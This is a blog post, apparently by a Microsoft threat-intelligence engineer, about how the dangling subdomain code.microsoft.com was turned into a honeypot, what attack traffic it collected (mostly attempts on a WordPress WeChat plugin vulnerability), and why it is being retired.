The domain name code.microsoft.com has an interesting story behind it. Today it’s not linked to anything but that wasn’t always true. This is the story of one of my most successful honeypot instances and how it enabled Microsoft to collect varied threat intelligence against a broad range of actor groups targeting Microsoft. I’m writing this now as we’ve decided to retire this capability.
In the past the domain ‘code.microsoft.com’ was an early domain used to host Visual Studio Code and some helpful documentation. The domain was active until around 2021, when this documentation was moved to a new home. The site behind the domain was an Azure AppService site that performed the redirection thus preventing existing links from being broken.
Sometime around mid-2021 the existing Azure AppService instance was shutdown leaving code.microsoft.com pointing to a service that no longer existed. This created a vulnerability.
This situation is what’s called a dangling subdomain which refers to a subdomain that once pointed to a valid resource but now hangs in limbo. Imagine a subdomain like blog.somedomain.com that used to handle a blog application. When the underlying service is deleted (the blog engine) you might update your page link and assume the service has been retired. However, there is still a subdomain that pointed to the blog entire, this is now “dangling” and can’t be resolved.
A malicious actor can discover the dangling subdomain. Provision a cloud Azure resource with the same name and now visiting blog.somedomain.com will redirect to the attacker’s resource. Here they control the content.
This happened in 2021 when the domain was temporarily used to host a malware C2 service. Thanks to multiple reports from our great community this was quickly spotted and taken down before it could be used. As a response to this Microsoft now has more robust tools in place to catch similar threats.
How did it become a honeypot?
Today it is relatively routine that MSTIC takes control of attacker-controlled resources and repurposes these for threat intelligence collection. Taking control of a malware C2 environment for example enables us to potentially discover new infected nodes.
At the time of the dangling code subdomain this process was relatively new. We wanted a good test case to show the value of taking over resources over taking them down. So instead of removing the dangling subdomain we pointed this instead to a node in our existing vast honeypot sensor network.
A honeypot is a decoy system designed to attract and monitor malicious activity. Honeypots can be used to collect information about the attackers, their tools, their techniques, and their intentions. Honeypots can also be used to divert the attackers from the real targets and to waste their time and resources.
Microsoft’s honeypot sensor network has been in development since 2018. It’s used to collect information on emerging threats to both our and our customers environments. The data we collect helps us be better informed when a new vulnerability is disclosed and gives us retrospective information on how, when and where exploits are deployed.
This data becomes enriched with other tools Microsoft has available and turns it from a source of raw threat data to threat intelligence. This is incorporate into a variety of our security products. Customers can also get access to this via Sentinel’s emerging threat feed.
The honeypot itself is a custom designed framework written in C#. It enables security researchers to quickly deploy anything from a single HTTP exploit handler in one or two lines of code all the way up to complex protocols like SSH and VNC. For even more complex protocols we can hand off to real systems when we detect exploit traffic and revert these shortly after.
It is our mission to deny threat actors access to resources or enable them to use our infrastructure to create further victims. That’s why in almost all scenarios the attacker is playing in a high interaction, simulated environment. No code is run, everything is a trick or deception designed to get them to reveal their intentions to us.
Substantial engineering has gone into our simulation framework. Today over 300 vulnerabilities can be triggered through the same exploit proof-of-concepts available in places like GitHub and exploitdb. Threat actors can communicate with over 30 different protocol and can even ‘log in’ and deploy scripts and execute payloads that look like they are operating on a real system. There is no real system and almost everything is being simulated.
Even so it’s important that in standing up a honeypot on an important domain like Microsoft.com that it wasn’t possible for attackers to use this as environment to perform other web attacks. Attacks that might rely on same origin trust. To mitigate this further we added the sandbox policy to the pages which prevents these kinds of attacks.
What have we learnt from the honeypot?
Our sensor network has contributed to many successes over the year. We’ve presented on these at computer security conferences in the past as well as shared our data with academia and the community. We incorporate this data into our security products to enable them to be aware of the latest threats.
In recent years this capability has been crucial to understanding the 0day and nDay ecosystem. During Log4shell incident we were able to use our sensor network to track each iteration of the underlying vulnerability and associated proof-of-concept all the way back to GitHub. This helped us understand the groups involved in productionising the exploit and where it was being targeted. Our data enables internal teams to be much better prepared to remediate and provides the analysis for detection authors to improved products like MDE in real time.
The team developing this capability also works closely with the MSRC who our track our own security issues. When the Exchange ProxyLogon vulnerability was announced we had already written a full exploit handler in our environment to track and understand not just the exploit but the groups deploying it. This situational awareness this enables us to give clearer advice to industry, better protect our customers and integrate new threats we were seeing into Windows Defender and MDE.
The domain code.microsoft.com was often critical to the success of this as well as a useful early warning system. When new vulnerabilities have been announced, threat actors can often be too consumed with trying to use the vulnerability as quickly as possible than checking for Deception infrastructure like a honeypot. As a result, code.microsoft.com often saw exploits first, many of these exploits were attributed to threat actors MSTIC already tracks.
What happened next?
The code subdomain had been known to bug bounty researchers for several years. When receiving reports for this domain these would be closed to let them know they had found a honeypot.
In the past we’ve asked these security professionals to refrain from publishing the details of this service is in effort to protect the value we received from it. We’ve also understood for a while that this subdomain would need to be retired when it because well know what was behind it.
That time is now.
On the 25th April an uptick in traffic to the subdomain and posts on Twitter showed that domain was being investigated by a broad groups of individuals. We don’t want to waste effort researchers put into finding issues with our production systems so it was decided that the truth would finally be revealed and the system retired.
The timeline below gives an order of events from our perspective. It’s unknown exactly how the full exploit URL for our server ended up in Google search database, but it looks like this and the associated discovery on Twitter/X culminated in almost 80k Wechat exploits in a 3 hour period. it’s unlikely the Google crawler would have naturally found the URL. Our current theory is that a security researcher found this and submitted a report to Microsoft. As part of this process either the Chrome browser or another app found this URL and submitted it for indexing.
March 2024 | WeChat exploit appear in Google search results for the first time |
15th April 2024 | Sumit Jain posts a redacted screenshot of a exploit mitigation, some debate occurs about whether the domain is the code subdomain. |
21st April 2024 | Google trends show that many people are now search for this domain |
24th April 2024 | We start to notice a significant uptick in traffic to the subdomain |
26th April 2024 | We are handling 126 thousand times more requests than average |
By 26th April we were handling ~160k requests per day, up from the usual 5-100. Most of these requests were to a single endpoint handling a vulnerability in the Wechat Broadcast plugin for WordPress (CVE-2018-16283). This enabled anyone to ‘run’ a command from a parameter in the URI.
Looking at these URI’s we found 11k different commands being run. Most of these pushed a message by some group or another stating that the site had been hacked by them. As this was a simulation, this did not happen.
Removing these messages gives a clearer picture of the kinds of commands people were entering.
Most commands entered were Linux recon commands. These attempted to find out what the system was, what files it contained and more broadly what value it was to Microsoft. The next biggest group were running command, these ranged from basic Linux commands like ‘whoami’ but a few enterprising folks went on to run scripts of various languages.
Most people who interacted didn’t get further that the Wechat exploit. Over the three days that infosec Twitter took interest 63 different exploits in total were triggered. The biggest surprise to me was that most researchers stuck to HTTP, only three groups probed the other ports and even fewer logged into the other services that were available.
Some of the best investigation came from @simplylurking2 on Twitter/X who after finding out the system was a honeypot continued to analyse what we had in place and constructed. First constructing a rick roll and then a URL that when visited would display a message to right click and save a payload.
With such a lot of information now publicly available the usefulness of this subdomain has also diminished. On April 26th we replaced the site with a 404 message and are working on retiring the subdomain completely.
Our TI collection is undiminished, Microsoft runs many of these collection services across multiple datacentres. Our concept has been proved and we have rolled out similar capabilities at higher scales in many other locations worldwide. These continue to give us a detailed picture of emerging threats.